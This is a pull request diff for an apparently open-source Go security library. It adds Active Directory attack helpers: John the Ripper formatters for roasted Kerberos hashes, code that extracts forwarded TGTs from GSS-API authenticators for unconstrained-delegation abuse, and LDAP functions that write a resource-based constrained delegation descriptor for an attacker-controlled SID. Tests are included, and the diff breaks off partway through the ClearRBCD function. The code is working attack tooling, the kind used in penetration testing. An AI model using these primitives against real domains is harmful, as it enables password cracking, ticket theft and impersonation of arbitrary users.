### PR TITLE
Add Kerberos offensive helpers: John output, targeted Kerberoasting, RBCD write, delegation extraction (Fixes #923)

### DIFF
--- a/network/kerberos/v5/attacks/john.go
+++ b/network/kerberos/v5/attacks/john.go
@@ -1,0 +1,77 @@
+package attacks
+
+import (
+	"encoding/hex"
+	"fmt"
+	"strings"
+
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/iana"
+)
+
+// John the Ripper's krb5asrep/krb5tgs formats differ from hashcat's in a few
+// subtle-but-load-bearing ways (verified against John Jumbo's own tests[]
+// vectors in src/krb5_asrep_fmt_plug.c and src/krb5_tgs_common_plug.c):
+//
+//   - RC4 (etype 23) AS-REP: John drops the "user@realm:" salt that hashcat mode
+//     18200 carries and stores only "$krb5asrep$23$<checksum>$<edata>" (RC4 has
+//     no salt, so the principal is not needed to crack).
+//   - RC4 (etype 23) TGS: John matches hashcat mode 13100 exactly —
+//     "$krb5tgs$23$*<user>$<realm>$<spn>*$<checksum>$<edata>".
+//   - AES (etype 17/18): both AS-REP and TGS use "$krb5<kind>$<etype>$<salt>$
+//     <edata>$<checksum>", where the checksum (the truncated HMAC) is appended
+//     AFTER the encrypted data (the reverse of RC4, where it comes first) and the
+//     salt is the Kerberos string-to-key salt "<UPPER-REALM><account>" with no
+//     separator (e.g. "EXAMPLE.COMluser").
+//
+// These functions sit alongside the hashcat formatters (FormatASREPHash /
+// FormatTGSHash) and reuse the same splitCipher helper to separate the checksum
+// from the encrypted data.
+
+// aesSalt builds the John/Kerberos string-to-key salt for an AES roast hash:
+// the uppercased realm concatenated with the account name and no separator, as
+// John expects it (e.g. realm "example.com" + user "luser" -> "EXAMPLE.COMluser").
+// This is correct for user service accounts (the common Kerberoasting /
+// AS-REP-roasting target); machine accounts use a host-based salt that the caller
+// must supply explicitly if it differs.
+func aesSalt(account, realm string) string {
+	return strings.ToUpper(realm) + account
+}
+
+// FormatASREPHashJohn formats an AS-REP encrypted part as a John the Ripper
+// krb5asrep hash.
+//
+// RC4 (etype 23) yields "$krb5asrep$23$<checksum>$<edata>" (no principal, unlike
+// hashcat mode 18200). AES enctypes (17/18) yield
+// "$krb5asrep$<etype>$<UPPER-REALM><username>$<edata>$<checksum>".
+func FormatASREPHashJohn(username, realm string, etype int, cipher []byte) (string, error) {
+	cksum, edata, err := splitCipher(etype, cipher)
+	if err != nil {
+		return "", err
+	}
+	if etype == iana.ETypeRC4HMAC {
+		return fmt.Sprintf("$krb5asrep$23$%s$%s",
+			hex.EncodeToString(cksum), hex.EncodeToString(edata)), nil
+	}
+	return fmt.Sprintf("$krb5asrep$%d$%s$%s$%s",
+		etype, aesSalt(username, realm), hex.EncodeToString(edata), hex.EncodeToString(cksum)), nil
+}
+
+// FormatTGSHashJohn formats a service ticket's encrypted part as a John the
+// Ripper krb5tgs hash.
+//
+// RC4 (etype 23) yields "$krb5tgs$23$*<account>$<realm>$<spn>*$<checksum>$<edata>"
+// (identical to hashcat mode 13100). AES enctypes (17/18) yield
+// "$krb5tgs$<etype>$<UPPER-REALM><account>$<edata>$<checksum>" (the checksum is
+// appended after the encrypted data and the account is folded into the salt).
+func FormatTGSHashJohn(account, realm, spn string, etype int, cipher []byte) (string, error) {
+	cksum, edata, err := splitCipher(etype, cipher)
+	if err != nil {
+		return "", err
+	}
+	if etype == iana.ETypeRC4HMAC {
+		return fmt.Sprintf("$krb5tgs$23$*%s$%s$%s*$%s$%s",
+			account, realm, spn, hex.EncodeToString(cksum), hex.EncodeToString(edata)), nil
+	}
+	return fmt.Sprintf("$krb5tgs$%d$%s$%s$%s",
+		etype, aesSalt(account, realm), hex.EncodeToString(edata), hex.EncodeToString(cksum)), nil
+}

--- a/network/kerberos/v5/attacks/john_test.go
+++ b/network/kerberos/v5/attacks/john_test.go
@@ -1,0 +1,88 @@
+package attacks
+
+import (
+	"testing"
+
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/iana"
+)
+
+// TestFormatASREPHashJohnRC4 checks the RC4 (etype 23) AS-REP form against a
+// John Jumbo tests[] vector: "$krb5asrep$23$<checksum>$<edata>" with no
+// principal (RC4 has no salt), and the checksum taken from the FIRST 16 bytes.
+func TestFormatASREPHashJohnRC4(t *testing.T) {
+	cksum := "c447eddaebf22ebf006a8fc6f986488c"
+	edata := "eb3a17eb56287b474cecad5d4e0490d9"
+	cipher := append(mustHex(t, cksum), mustHex(t, edata)...)
+
+	got, err := FormatASREPHashJohn("victim", "corp.local", iana.ETypeRC4HMAC, cipher)
+	if err != nil {
+		t.Fatalf("FormatASREPHashJohn: %v", err)
+	}
+	want := "$krb5asrep$23$" + cksum + "$" + edata
+	if got != want {
+		t.Errorf("RC4 AS-REP John:\n got  %s\n want %s", got, want)
+	}
+}
+
+// TestFormatASREPHashJohnAES checks the AES (etype 18) AS-REP form against the
+// John Jumbo tests[] vector "$krb5asrep$18$EXAMPLE.COMluser$<edata>$<checksum>":
+// salt = UPPER(realm)+user, edata BEFORE the trailing 12-byte HMAC checksum.
+func TestFormatASREPHashJohnAES(t *testing.T) {
+	edata := "42e34732112be6cec1532177a6c93af5"
+	cksum := "420973360c2e907b9053f1db" // 12 bytes (aes256-cts-hmac-sha1-96)
+	cipher := append(mustHex(t, edata), mustHex(t, cksum)...)
+
+	got, err := FormatASREPHashJohn("luser", "example.com", iana.ETypeAES256CTSHMACSHA196, cipher)
+	if err != nil {
+		t.Fatalf("FormatASREPHashJohn: %v", err)
+	}
+	want := "$krb5asrep$18$EXAMPLE.COMluser$" + edata + "$" + cksum
+	if got != want {
+		t.Errorf("AES AS-REP John:\n got  %s\n want %s", got, want)
+	}
+}
+
+// TestFormatTGSHashJohnRC4 checks the RC4 (etype 23) TGS form, which John shares
+// with hashcat mode 13100: "$krb5tgs$23$*user$realm$spn*$<checksum>$<edata>".
+func TestFormatTGSHashJohnRC4(t *testing.T) {
+	cksum := "63386d22d359fe42230300d56852c9eb"
+	edata := "0011223344556677"
+	cipher := append(mustHex(t, cksum), mustHex(t, edata)...)
+
+	got, err := FormatTGSHashJohn("user", "realm", "test/spn", iana.ETypeRC4HMAC, cipher)
+	if err != nil {
+		t.Fatalf("FormatTGSHashJohn: %v", err)
+	}
+	want := "$krb5tgs$23$*user$realm$test/spn*$" + cksum + "$" + edata
+	if got != want {
+		t.Errorf("RC4 TGS John:\n got  %s\n want %s", got, want)
+	}
+}
+
+// TestFormatTGSHashJohnAES checks the AES (etype 18) TGS form:
+// "$krb5tgs$18$<UPPER-REALM><account>$<edata>$<checksum>" with the checksum
+// appended after the encrypted data (mirroring the AES AS-REP layout).
+func TestFormatTGSHashJohnAES(t *testing.T) {
+	edata := "8899aabbccddeeff0011223344556677"
+	cksum := "aabbccddeeff00112233445566"[:24] // 12 bytes
+	cipher := append(mustHex(t, edata), mustHex(t, cksum)...)
+
+	got, err := FormatTGSHashJohn("svc_web", "corp.local", "HTTP/web.corp.local", iana.ETypeAES256CTSHMACSHA196, cipher)
+	if err != nil {
+		t.Fatalf("FormatTGSHashJohn: %v", err)
+	}
+	want := "$krb5tgs$18$CORP.LOCALsvc_web$" + edata + "$" + cksum
+	if got != want {
+		t.Errorf("AES TGS John:\n got  %s\n want %s", got, want)
+	}
+}
+
+// TestFormatJohnUnsupportedEType ensures an unsupported enctype is rejected.
+func TestFormatJohnUnsupportedEType(t *testing.T) {
+	if _, err := FormatASREPHashJohn("u", "r", 1, []byte{1, 2, 3}); err == nil {
+		t.Error("expected error for unsupported etype in AS-REP John format")
+	}
+	if _, err := FormatTGSHashJohn("u", "r", "s/h", 1, []byte{1, 2, 3}); err == nil {
+		t.Error("expected error for unsupported etype in TGS John format")
+	}
+}

--- a/network/kerberos/v5/crypto/crypto.go
+++ b/network/kerberos/v5/crypto/crypto.go
@@ -26,6 +26,7 @@ const (
 	KeyUsageTGSRepEncSubSessionKey = iana.KeyUsageTGSRepEncSubSessionKey
 	KeyUsageAPReqAuthen            = iana.KeyUsageAPReqAuthen
 	KeyUsageAPRepEncPart           = iana.KeyUsageAPRepEncPart
+	KeyUsageKRBCredEncPart         = iana.KeyUsageKRBCredEncPart
 )
 
 // Sentinel errors for cryptographic operations.

--- a/network/kerberos/v5/gssapi/delegation.go
+++ b/network/kerberos/v5/gssapi/delegation.go
@@ -1,0 +1,125 @@
+package gssapi
+
+import (
+	"encoding/binary"
+	"fmt"
+
+	kerbcrypto "github.com/TheManticoreProject/Manticore/network/kerberos/v5/crypto"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/messages"
+)
+
+// Unconstrained-delegation capture.
+//
+// When a client authenticates to a service trusted for unconstrained delegation
+// (or is coerced into doing so, e.g. via the printer/PetitPotam bugs), it embeds
+// a forwarded TGT for itself inside the AP-REQ. That forwarded TGT rides in the
+// GSS-API 0x8003 authenticator checksum (RFC 4121 Section 4.1.1): when the
+// GSS_C_DELEG_FLAG bit is set, the checksum value is extended with a DlgOpt /
+// Dlgth / Deleg triple whose Deleg field is a full KRB-CRED (APPLICATION[22])
+// carrying the forwarded ticket. A service that receives such an AP-REQ can
+// decrypt the authenticator with its own long-term key, pull the KRB-CRED out of
+// the checksum, decrypt the KRB-CRED enc-part with the authenticator subkey, and
+// reuse the forwarded TGT as the client — the classic unconstrained-delegation
+// attack.
+//
+// The helpers below implement both directions: appending a delegation to a
+// 0x8003 checksum (GSSChecksumValueWithDelegation) and extracting one back out
+// (ExtractDelegation / ExtractDelegatedCred), plus the enc-part decryption
+// (DecryptDelegatedCredPart).
+
+// gss8003MinLen is the length of the fixed part of a 0x8003 checksum value
+// (Lgth[4] | Bnd[16] | Flags[4]).
+const gss8003MinLen = 24
+
+// GSSChecksumValueWithDelegation builds a 0x8003 authenticator checksum value
+// that carries a forwarded credential (RFC 4121 Section 4.1.1): the fixed
+// Lgth | Bnd | Flags header (with GSS_C_DELEG_FLAG forced on) followed by
+// DlgOpt (1) | Dlgth | Deleg, where Deleg is a marshaled KRB-CRED. It is the
+// inverse of ExtractDelegation and lets the extraction path be exercised without
+// a live KDC.
+func GSSChecksumValueWithDelegation(flags uint32, channelBindings, krbCred []byte) []byte {
+	base := GSSChecksumValue(flags|GSSDelegFlag, channelBindings)
+	out := make([]byte, len(base), len(base)+4+len(krbCred))
+	copy(out, base)
+	var dlg [4]byte
+	binary.LittleEndian.PutUint16(dlg[0:], 1)                    // DlgOpt
+	binary.LittleEndian.PutUint16(dlg[2:], uint16(len(krbCred))) // Dlgth
+	out = append(out, dlg[:]...)
+	out = append(out, krbCred...)
+	return out
+}
+
+// ExtractDelegation parses a 0x8003 authenticator checksum value and returns the
+// embedded KRB-CRED bytes (the forwarded credential). It returns (nil, nil) when
+// the checksum is well-formed but carries no delegation (GSS_C_DELEG_FLAG clear),
+// and an error when the checksum is malformed or truncated.
+func ExtractDelegation(checksumValue []byte) ([]byte, error) {
+	if len(checksumValue) < gss8003MinLen {
+		return nil, fmt.Errorf("gssapi: 0x8003 checksum too short (%d bytes)", len(checksumValue))
+	}
+	flags := binary.LittleEndian.Uint32(checksumValue[20:24])
+	if flags&GSSDelegFlag == 0 {
+		// No delegation present; not an error, just nothing to extract.
+		return nil, nil
+	}
+	if len(checksumValue) < gss8003MinLen+4 {
+		return nil, fmt.Errorf("gssapi: delegation flag set but checksum has no DlgOpt/Dlgth")
+	}
+	dlgth := int(binary.LittleEndian.Uint16(checksumValue[26:28]))
+	deleg := checksumValue[28:]
+	if len(deleg) < dlgth {
+		return nil, fmt.Errorf("gssapi: delegation length %d exceeds available %d bytes", dlgth, len(deleg))
+	}
+	return deleg[:dlgth], nil
+}
+
+// ExtractDelegatedCred parses the GSS 0x8003 checksum of a decrypted AP-REQ
+// authenticator and returns the forwarded KRB-CRED it carries. The authenticator
+// must already be decrypted (with the service's long-term key, key usage 11).
+// It returns (nil, nil) when the authenticator carries no GSS delegation.
+func ExtractDelegatedCred(auth *messages.Authenticator) (*messages.KRBCred, error) {
+	if auth == nil || auth.Cksum == nil {
+		return nil, nil
+	}
+	if auth.Cksum.CKSumType != ChecksumTypeGSSAPI {
+		return nil, nil
+	}
+	credBytes, err := ExtractDelegation(auth.Cksum.Checksum)
+	if err != nil {
+		return nil, err
+	}
+	if len(credBytes) == 0 {
+		return nil, nil
+	}
+	var cred messages.KRBCred
+	if _, err := cred.Unmarshal(credBytes); err != nil {
+		return nil, fmt.Errorf("gssapi: parse delegated KRB-CRED: %w", err)
+	}
+	return &cred, nil
+}
+
+// DecryptDelegatedCredPart decrypts the enc-part of a forwarded KRB-CRED with the
+// authenticator subkey (or session key) that keyed the AP-REQ, using KRB-CRED
+// key usage 14, and returns the parsed EncKrbCredPart. That enc-part holds the
+// forwarded ticket's session key and lifetimes, which together with the ticket
+// in cred.Tickets form a reusable TGT (a ".kirbi" for pass-the-ticket).
+func DecryptDelegatedCredPart(cred *messages.KRBCred, subKey messages.EncryptionKey) (*messages.EncKrbCredPart, error) {
+	if cred == nil {
+		return nil, fmt.Errorf("gssapi: nil KRB-CRED")
+	}
+	// A locally forged/exported KRB-CRED may carry an unencrypted enc-part
+	// (etype 0); accept it verbatim so extraction works without a key too.
+	plain := cred.EncPart.Cipher
+	if cred.EncPart.EType != 0 {
+		var err error
+		plain, err = kerbcrypto.Decrypt(subKey.KeyType, subKey.KeyValue, kerbcrypto.KeyUsageKRBCredEncPart, cred.EncPart.Cipher)
+		if err != nil {
+			return nil, fmt.Errorf("gssapi: decrypt KRB-CRED enc-part: %w", err)
+		}
+	}
+	var enc messages.EncKrbCredPart
+	if _, err := enc.Unmarshal(plain); err != nil {
+		return nil, fmt.Errorf("gssapi: parse EncKrbCredPart: %w", err)
+	}
+	return &enc, nil
+}

--- a/network/kerberos/v5/gssapi/delegation_test.go
+++ b/network/kerberos/v5/gssapi/delegation_test.go
@@ -1,0 +1,158 @@
+package gssapi
+
+import (
+	"bytes"
+	"testing"
+	"time"
+
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/messages"
+)
+
+// buildForwardedCred builds a KRB-CRED carrying a single (unencrypted) forwarded
+// TGT, as would be delegated over unconstrained delegation.
+func buildForwardedCred(t *testing.T) ([]byte, *messages.KRBCred) {
+	t.Helper()
+	tkt := messages.Ticket{
+		TktVno: messages.KerberosV5,
+		Realm:  "CORP.LOCAL",
+		SName:  messages.PrincipalName{NameType: messages.NameTypeSRVInst, NameString: []string{"krbtgt", "CORP.LOCAL"}},
+		EncPart: messages.EncryptedData{
+			EType:  messages.ETypeAES256CTSHMACSHA196,
+			Cipher: bytes.Repeat([]byte{0xCD}, 32),
+		},
+	}
+	tktRaw, err := tkt.Marshal()
+	if err != nil {
+		t.Fatalf("Ticket.Marshal: %v", err)
+	}
+	enc := messages.EncKrbCredPart{
+		TicketInfo: []messages.KrbCredInfo{{
+			Key:       messages.EncryptionKey{KeyType: messages.ETypeAES256CTSHMACSHA196, KeyValue: bytes.Repeat([]byte{0x22}, 32)},
+			PRealm:    "CORP.LOCAL",
+			PName:     messages.PrincipalName{NameType: messages.NameTypePrincipal, NameString: []string{"victim"}},
+			SRealm:    "CORP.LOCAL",
+			SName:     messages.PrincipalName{NameType: messages.NameTypeSRVInst, NameString: []string{"krbtgt", "CORP.LOCAL"}},
+			EndTime:   time.Date(2026, 7, 10, 20, 0, 0, 0, time.UTC),
+			RenewTill: time.Date(2026, 7, 17, 20, 0, 0, 0, time.UTC),
+		}},
+	}
+	encBytes, err := enc.Marshal()
+	if err != nil {
+		t.Fatalf("EncKrbCredPart.Marshal: %v", err)
+	}
+	cred := &messages.KRBCred{
+		Tickets:    []messages.Ticket{tkt},
+		TicketsRaw: [][]byte{tktRaw},
+		EncPart:    messages.EncryptedData{EType: 0, Cipher: encBytes},
+	}
+	credBytes, err := cred.Marshal()
+	if err != nil {
+		t.Fatalf("KRBCred.Marshal: %v", err)
+	}
+	return credBytes, cred
+}
+
+// TestGSSChecksumDelegationRoundTrip builds a 0x8003 checksum with a delegated
+// KRB-CRED and extracts it back, verifying the RFC 4121 Section 4.1.1 layout.
+func TestGSSChecksumDelegationRoundTrip(t *testing.T) {
+	credBytes, _ := buildForwardedCred(t)
+
+	cksum := GSSChecksumValueWithDelegation(GSSMutualFlag, nil, credBytes)
+
+	// The delegation flag must be set even though only GSSMutualFlag was passed.
+	if cksum[20]&GSSDelegFlag == 0 {
+		t.Errorf("delegation flag not set in checksum flags: % X", cksum[20:24])
+	}
+
+	got, err := ExtractDelegation(cksum)
+	if err != nil {
+		t.Fatalf("ExtractDelegation: %v", err)
+	}
+	if !bytes.Equal(got, credBytes) {
+		t.Errorf("extracted KRB-CRED bytes differ from input")
+	}
+}
+
+// TestExtractDelegationNoFlag verifies a checksum without the delegation flag
+// yields no credential (and no error).
+func TestExtractDelegationNoFlag(t *testing.T) {
+	cksum := GSSChecksumValue(GSSMutualFlag, nil) // no deleg flag
+	got, err := ExtractDelegation(cksum)
+	if err != nil {
+		t.Fatalf("ExtractDelegation: %v", err)
+	}
+	if got != nil {
+		t.Errorf("expected no delegation, got %d bytes", len(got))
+	}
+}
+
+// TestExtractDelegationTruncated verifies malformed checksums are rejected.
+func TestExtractDelegationTruncated(t *testing.T) {
+	if _, err := ExtractDelegation([]byte{1, 2, 3}); err == nil {
+		t.Error("expected error for short checksum")
+	}
+	// Deleg flag set but no DlgOpt/Dlgth trailer.
+	short := GSSChecksumValue(GSSDelegFlag, nil)
+	if _, err := ExtractDelegation(short); err == nil {
+		t.Error("expected error for deleg flag with no trailer")
+	}
+	// Dlgth claims more bytes than are present.
+	bad := GSSChecksumValueWithDelegation(0, nil, []byte{0xAA, 0xBB, 0xCC, 0xDD})
+	bad = bad[:len(bad)-2] // chop the KRB-CRED payload
+	if _, err := ExtractDelegation(bad); err == nil {
+		t.Error("expected error for Dlgth overrun")
+	}
+}
+
+// TestExtractDelegatedCred exercises the full authenticator -> KRB-CRED ->
+// EncKrbCredPart path against an unencrypted (etype 0) forwarded credential.
+func TestExtractDelegatedCred(t *testing.T) {
+	credBytes, want := buildForwardedCred(t)
+
+	auth := &messages.Authenticator{
+		AVno:   messages.KerberosV5,
+		CRealm: "CORP.LOCAL",
+		CName:  messages.PrincipalName{NameType: messages.NameTypePrincipal, NameString: []string{"victim"}},
+		Cksum: &messages.Checksum{
+			CKSumType: ChecksumTypeGSSAPI,
+			Checksum:  GSSChecksumValueWithDelegation(GSSMutualFlag, nil, credBytes),
+		},
+		CTime: time.Now().UTC(),
+	}
+
+	cred, err := ExtractDelegatedCred(auth)
+	if err != nil {
+		t.Fatalf("ExtractDelegatedCred: %v", err)
+	}
+	if cred == nil {
+		t.Fatal("expected a delegated credential")
+	}
+	if len(cred.Tickets) != 1 || cred.Tickets[0].Realm != want.Tickets[0].Realm {
+		t.Errorf("delegated ticket mismatch: %+v", cred.Tickets)
+	}
+
+	// etype 0 enc-part: decrypt with an empty key (no crypto needed).
+	part, err := DecryptDelegatedCredPart(cred, messages.EncryptionKey{})
+	if err != nil {
+		t.Fatalf("DecryptDelegatedCredPart: %v", err)
+	}
+	if len(part.TicketInfo) != 1 || part.TicketInfo[0].PName.NameString[0] != "victim" {
+		t.Errorf("forwarded enc-part mismatch: %+v", part.TicketInfo)
+	}
+	wantEnd := time.Date(2026, 7, 10, 20, 0, 0, 0, time.UTC)
+	if !part.TicketInfo[0].EndTime.Equal(wantEnd) {
+		t.Errorf("forwarded ticket endtime: got %v want %v", part.TicketInfo[0].EndTime, wantEnd)
+	}
+}
+
+// TestExtractDelegatedCredNonGSS verifies a non-GSS authenticator checksum is
+// ignored (no delegation, no error).
+func TestExtractDelegatedCredNonGSS(t *testing.T) {
+	auth := &messages.Authenticator{
+		Cksum: &messages.Checksum{CKSumType: 1, Checksum: []byte{1, 2, 3, 4}},
+	}
+	cred, err := ExtractDelegatedCred(auth)
+	if err != nil || cred != nil {
+		t.Errorf("expected no cred/no error for non-GSS checksum, got %v / %v", cred, err)
+	}
+}

--- a/network/kerberos/v5/messages/kdcreqbody.go
+++ b/network/kerberos/v5/messages/kdcreqbody.go
@@ -12,7 +12,12 @@ import (
 // Realm has no struct tag: Go ignores explicit,tag:N for asn1.RawValue fields, so
 // realmExplicit() pre-builds the [2] EXPLICIT { GeneralString } wrapper instead.
 type kdcReqBodyMarshal struct {
-	KDCOptions  asn1.BitString       `asn1:"explicit,tag:0"`
+	KDCOptions asn1.BitString `asn1:"explicit,tag:0"`
+	// CName is optional and left at its zero value for a TGS-REQ so the optional
+	// tag omits it entirely. cname is present in an AS-REQ (always non-empty
+	// there) but MUST be absent from a TGS-REQ: a Windows KDC rejects an
+	// S4U2Proxy request that carries an (even empty) cname alongside the
+	// cname-in-additional-ticket option with KDC_ERR_BADOPTION.
 	CName       PrincipalNameMarshal `asn1:"explicit,tag:1,optional"`
 	Realm       asn1.RawValue        // pre-encoded as [2] EXPLICIT { GeneralString } by realmExplicit
 	SName       PrincipalNameMarshal `asn1:"explicit,tag:3,optional"`
@@ -31,9 +36,17 @@ type kdcReqBodyMarshal struct {
 // marshalKDCReqBody converts a KDCReqBody to its GeneralString-encoded form
 // (fields 0-10; additional-tickets are handled separately).
 func marshalKDCReqBody(b KDCReqBody) kdcReqBodyMarshal {
+	// Only emit cname when it carries a name (AS-REQ). For a TGS-REQ leave it at
+	// the zero value so the optional tag omits it: MarshalPrincipalName would
+	// otherwise produce a non-nil (empty) NameString slice that the optional
+	// check does not treat as empty, emitting a spurious empty cname.
+	var cname PrincipalNameMarshal
+	if len(b.CName.NameString) > 0 {
+		cname = MarshalPrincipalName(b.CName)
+	}
 	return kdcReqBodyMarshal{
 		KDCOptions:  b.KDCOptions,
-		CName:       MarshalPrincipalName(b.CName),
+		CName:       cname,
 		Realm:       realmExplicit(2, b.Realm),
 		SName:       MarshalPrincipalName(b.SName),
 		From:        b.From,

--- a/network/ldap/rbcd.go
+++ b/network/ldap/rbcd.go
@@ -1,0 +1,195 @@
+package ldap
+
+import (
+	"encoding/binary"
+	"fmt"
+	"strings"
+
+	"github.com/TheManticoreProject/winacl/securitydescriptor"
+	"github.com/TheManticoreProject/winacl/sid"
+)
+
+// Resource-Based Constrained Delegation (RBCD) write primitives.
+//
+// RBCD is configured by the msDS-AllowedToActOnBehalfOfOtherIdentity attribute
+// on the *resource* (target) computer object. The attribute holds a binary
+// Windows security descriptor whose DACL lists the principals allowed to invoke
+// S4U2Proxy against that resource on behalf of arbitrary users. The descriptor
+// written by delegation tooling is, in SDDL terms:
+//
+//	O:BAD:(A;;FA;;;<attacker-SID>)
+//
+// i.e. owner = BUILTIN\Administrators (BA) and a single Allow ACE granting the
+// specific full-control mask (0x000F01FF) to the attacker-controlled account's
+// SID. Once this is in place, the attacker account (which must itself have an
+// SPN) can run S4U2Self -> S4U2Proxy through the target to obtain a service
+// ticket to the target as any user (see KerberosClient.S4U2Self / S4U2Proxy).
+//
+// AttackerSIDs typically has one entry; multiple SIDs are supported by emitting
+// one Allow ACE per SID.
+
+// RBCDAttribute is the LDAP attribute that stores the RBCD security descriptor.
+const RBCDAttribute = "msDS-AllowedToActOnBehalfOfOtherIdentity"
+
+// RBCD descriptor constants. The descriptor is O:BAD:(A;;<mask>;;;<SID>) with one
+// Allow ACE per SID, but it must be built with the exact rights and ACL revision
+// the Windows KDC honours when it evaluates the attribute for S4U2Proxy:
+//
+//   - the ACE access mask is the specific full-control set 0x000F01FF, NOT the
+//     generic GENERIC_ALL (0x10000000): the KDC's access check does not expand
+//     generic rights here, so a GA ACE is silently ignored and delegation is
+//     denied with KDC_ERR_BADOPTION.
+//   - the DACL uses ACL_REVISION_DS (4), matching what AD stores for this
+//     directory-service security descriptor.
+const (
+	rbcdAceAccessMask   = 0x000F01FF // specific full control (Windows/RBCD standard)
+	aclRevisionDS       = 4          // ACL_REVISION_DS
+	seSelfRelative      = 0x8000     // SE_SELF_RELATIVE
+	seDaclPresent       = 0x0004     // SE_DACL_PRESENT
+	aceTypeAllowed      = 0x00       // ACCESS_ALLOWED_ACE_TYPE
+	sdHeaderLen         = 20         // fixed self-relative SD header length
+	builtinAdminsSIDStr = "S-1-5-32-544"
+)
+
+// BuildRBCDDescriptor builds the binary security descriptor for
+// msDS-AllowedToActOnBehalfOfOtherIdentity that allows each of allowedSIDs to act
+// on behalf of other identities against the resource. It is the self-relative
+// SD O:BAD:(A;;FA;;;<SID>) — owner BUILTIN\Administrators and one ACCESS_ALLOWED
+// ACE per SID granting the specific full-control mask 0x000F01FF — built to the
+// exact byte layout the Windows KDC accepts (see the RBCD descriptor constants).
+//
+// Each SID must be a valid string SID (e.g. "S-1-5-21-...-1123"). It returns the
+// marshaled descriptor bytes ready to be written to the attribute.
+func BuildRBCDDescriptor(allowedSIDs ...string) ([]byte, error) {
+	if len(allowedSIDs) == 0 {
+		return nil, fmt.Errorf("rbcd: at least one allowed SID is required")
+	}
+
+	owner := &sid.SID{}
+	if err := owner.FromString(builtinAdminsSIDStr); err != nil {
+		return nil, fmt.Errorf("rbcd: build owner SID: %w", err)
+	}
+	ownerBytes, err := owner.Marshal()
+	if err != nil {
+		return nil, fmt.Errorf("rbcd: marshal owner SID: %w", err)
+	}
+
+	// Build the DACL: one ACCESS_ALLOWED_ACE per allowed SID.
+	var aces []byte
+	for _, s := range allowedSIDs {
+		parsed := &sid.SID{}
+		if err := parsed.FromString(strings.TrimSpace(s)); err != nil {
+			return nil, fmt.Errorf("rbcd: invalid SID %q: %w", s, err)
+		}
+		sidBytes, err := parsed.Marshal()
+		if err != nil {
+			return nil, fmt.Errorf("rbcd: marshal SID %q: %w", s, err)
+		}
+		aceSize := 8 + len(sidBytes) // header(4) + mask(4) + SID
+		ace := make([]byte, 8, aceSize)
+		ace[0] = aceTypeAllowed
+		ace[1] = 0x00 // ACE flags
+		binary.LittleEndian.PutUint16(ace[2:], uint16(aceSize))
+		binary.LittleEndian.PutUint32(ace[4:], rbcdAceAccessMask)
+		ace = append(ace, sidBytes...)
+		aces = append(aces, ace...)
+	}
+
+	aclSize := 8 + len(aces) // ACL header(8) + ACEs
+	dacl := make([]byte, 8, aclSize)
+	dacl[0] = aclRevisionDS
+	dacl[1] = 0x00 // Sbz1
+	binary.LittleEndian.PutUint16(dacl[2:], uint16(aclSize))
+	binary.LittleEndian.PutUint16(dacl[4:], uint16(len(allowedSIDs))) // AceCount
+	binary.LittleEndian.PutUint16(dacl[6:], 0x0000)                   // Sbz2
+	dacl = append(dacl, aces...)
+
+	// Assemble the self-relative SD: header | DACL | owner SID.
+	offsetDacl := sdHeaderLen
+	offsetOwner := sdHeaderLen + len(dacl)
+	sd := make([]byte, sdHeaderLen, offsetOwner+len(ownerBytes))
+	sd[0] = 0x01                                                        // Revision
+	sd[1] = 0x00                                                        // Sbz1
+	binary.LittleEndian.PutUint16(sd[2:], seSelfRelative|seDaclPresent) // Control
+	binary.LittleEndian.PutUint32(sd[4:], uint32(offsetOwner))          // OffsetOwner
+	binary.LittleEndian.PutUint32(sd[8:], 0)                            // OffsetGroup
+	binary.LittleEndian.PutUint32(sd[12:], 0)                           // OffsetSacl
+	binary.LittleEndian.PutUint32(sd[16:], uint32(offsetDacl))          // OffsetDacl
+	sd = append(sd, dacl...)
+	sd = append(sd, ownerBytes...)
+	return sd, nil
+}
+
+// ParseRBCDDescriptor parses a binary msDS-AllowedToActOnBehalfOfOtherIdentity
+// descriptor and returns the string SIDs granted access by its DACL. It is the
+// inverse of BuildRBCDDescriptor and is used to confirm what a target currently
+// allows (or to verify a write).
+func ParseRBCDDescriptor(raw []byte) ([]string, error) {
+	if len(raw) == 0 {
+		return nil, nil
+	}
+	ntsd := securitydescriptor.NewSecurityDescriptor()
+	if _, err := ntsd.Unmarshal(raw); err != nil {
+		return nil, fmt.Errorf("rbcd: parse descriptor: %w", err)
+	}
+	dacl := ntsd.GetDacl()
+	if dacl == nil {
+		return nil, nil
+	}
+	sids := make([]string, 0, len(dacl.Entries))
+	for i := range dacl.Entries {
+		sids = append(sids, dacl.Entries[i].Identity.SID.String())
+	}
+	return sids, nil
+}
+
+// WriteRBCD writes an RBCD security descriptor onto targetComputerDN's
+// msDS-AllowedToActOnBehalfOfOtherIdentity, allowing each of allowedSIDs to act
+// on behalf of other identities against that computer. It replaces any existing
+// value. Pair it with ClearRBCD to restore the target after the attack.
+func (ldapSession *Session) WriteRBCD(targetComputerDN string, allowedSIDs ...string) error {
+	raw, err := BuildRBCDDescriptor(allowedSIDs...)
+	if err != nil {
+		return err
+	}
+	// The attribute is a plain octet string holding an SD; unlike
+	// nTSecurityDescriptor it needs no SD-flags control.
+	req := NewModifyRequest(targetComputerDN)
+	req.Replace(RBCDAttribute, []string{string(raw)})
+	if err := ldapSession.Modify(req); err != nil {
+		return fmt.Errorf("rbcd: write %s on %q: %w", RBCDAttribute, targetComputerDN, err)
+	}
+	return nil
+}
+
+// ReadRBCD reads targetComputerDN's msDS-AllowedToActOnBehalfOfOtherIdentity and
+// returns the raw descriptor bytes and the string SIDs it grants. Both are nil
+// when the attribute is not set.
+func (ldapSession *Session) ReadRBCD(targetComputerDN string) ([]byte, []string, error) {
+	entries, err := ldapSession.QueryBaseObject(targetComputerDN, "(objectClass=*)", []string{RBCDAttribute})
+	if err != nil {
+		return nil, nil, fmt.Errorf("rbcd: read %s on %q: %w", RBCDAttribute, targetComputerDN, err)
+	}
+	if len(entries) == 0 {
+		return nil, nil, fmt.Errorf("rbcd: no entry returned for %q", targetComputerDN)
+	}
+	raw := entries[0].GetRawAttributeValue(RBCDAttribute)
+	if len(raw) == 0 {
+		return nil, nil, nil
+	}
+	sids, err := ParseRBCDDescriptor(raw)
+	if err != nil {
+		return raw, nil, err
+	}
+	return raw, sids, nil
+}
+
+// ClearRBCD removes the msDS-AllowedToActOnBehalfOfOtherIdentity attribute from
